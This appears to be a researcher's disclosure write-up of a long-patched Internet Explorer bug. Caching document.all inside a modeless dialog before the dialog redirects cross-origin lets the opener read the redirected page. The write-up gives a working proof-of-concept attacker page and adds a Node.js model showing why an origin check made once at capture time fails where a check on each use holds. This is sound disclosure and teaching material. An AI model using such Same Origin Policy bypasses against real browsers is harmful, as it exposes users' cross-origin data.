I noticed that saving a reference to document.all from inside a modeless dialog, before the dialog’s page redirected to a different origin, preserved cross-origin access to the redirected document. After the redirect, the cached document.all collection still pointed to nodes whose ownerDocument was the cross-origin page, allowing its content to be read freely.
```html
<!-- index.html (attacker page) -->
<script>
function main()
{
    // Open a modeless dialog on a same-origin page that will later redirect cross-origin.
    var win = showModelessDialog("redirect.aspx", window, "dialogwidth=400px;dialogHeight=300px");

    // Code to run inside the dialog: stash its live document.all collection on the opener
    // (reachable as dialogArguments), then block on an alert so the dialog stays open.
    var strCode = 'dialogArguments.cachedDocAll = document.all;' +
                  'alert("Please, don\'t close this alert yet");';
    win.setTimeout(strCode);

    // Give the dialog time to redirect before dereferencing the cached collection.
    setTimeout("useCachedDocAll()", 2000);
}

function useCachedDocAll()
{
    // The cached collection resolves against the dialog's current (post-redirect) document.
    alert("Content coming from: " + cachedDocAll[0].ownerDocument.URL +
          "\n\ndocument.body.innerText:\n" + cachedDocAll[0].ownerDocument.body.innerText);
}
</script>
<input type="button" onclick="main()" value="Do it!">
```
The dialog ran code that stored its document.all collection into the opener's cachedDocAll property. When the server-side redirect moved the dialog to a different origin, the Same Origin Policy should have severed that reference; instead, cachedDocAll[0].ownerDocument still resolved to the post-redirect cross-origin document, and its body.innerText exposed the page content. The underlying defect is an origin check performed once, when the reference was handed out, rather than on every dereference.
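The following is an added illustration, not code from the original post or from the browser in question: a small Node.js model of the capture-time versus use-time origin check described above. A live collection that follows the dialog's navigation is compared with a hardened variant that repeats the origin check on each dereference. All names here (BrowsingContext, docAllUnguarded, docAllGuarded, readViaCache) and the URLs and page text are constructed for the example.

```javascript
// Added example (hypothetical model, not the original post's code).
// Shows why a DOM reference captured while same-origin must be re-checked on
// every use: a one-time check at capture time survives a cross-origin navigation.

class SecurityError extends Error {
  constructor(msg) { super(msg); this.name = "SecurityError"; }
}

// Origin = scheme + host (+ port), the tuple the Same Origin Policy compares.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// A browsing context (the dialog's window). Navigating replaces its document.
class BrowsingContext {
  constructor(url, bodyText) { this.navigate(url, bodyText); }
  navigate(url, bodyText) {
    this.document = { URL: url, body: { innerText: bodyText } };
  }
}

// Model of the buggy live collection: element 0's ownerDocument resolves against
// whatever document the context holds *now*, with no check at access time.
function docAllUnguarded(ctx) {
  return [{ get ownerDocument() { return ctx.document; } }];
}

// Hardened variant: the origin of the current document is compared with the
// caller's origin on every dereference, so the reference dies once the context
// navigates cross-origin.
function docAllGuarded(ctx, callerOrigin) {
  return [{
    get ownerDocument() {
      const docOrigin = originOf(ctx.document.URL);
      if (docOrigin !== callerOrigin) {
        throw new SecurityError(
          `Blocked "${callerOrigin}" from accessing a document at origin "${docOrigin}"`);
      }
      return ctx.document;
    },
  }];
}

// Replays the scenario: the attacker page caches document.all while the dialog
// is same-origin, the dialog then redirects cross-origin, and the cached
// reference is dereferenced. Returns the text read, or "blocked".
function readViaCache(guarded) {
  const attackerOrigin = "http://attacker.example";                       // constructed
  const dialog = new BrowsingContext("http://attacker.example/redirect.aspx", "loading"); // constructed

  // Capture-time check: same-origin at this moment, so both variants hand out a reference.
  if (originOf(dialog.document.URL) !== attackerOrigin) {
    throw new SecurityError("initial access should be same-origin");
  }
  const cachedDocAll = guarded ? docAllGuarded(dialog, attackerOrigin) : docAllUnguarded(dialog);

  // The server-side redirect lands the dialog on a different origin.
  dialog.navigate("https://bank.example/account", "balance: constructed secret"); // constructed

  try {
    return cachedDocAll[0].ownerDocument.body.innerText;
  } catch (e) {
    if (e instanceof SecurityError) return "blocked";
    throw e;
  }
}

console.log("unguarded:", readViaCache(false)); // leaks the cross-origin text
console.log("guarded:  ", readViaCache(true));  // "blocked"
```

The point of the model is the placement of the check: the guarded getter never trusts the decision made when the collection was created, because the document behind a browsing context can change underneath a long-lived reference.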
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.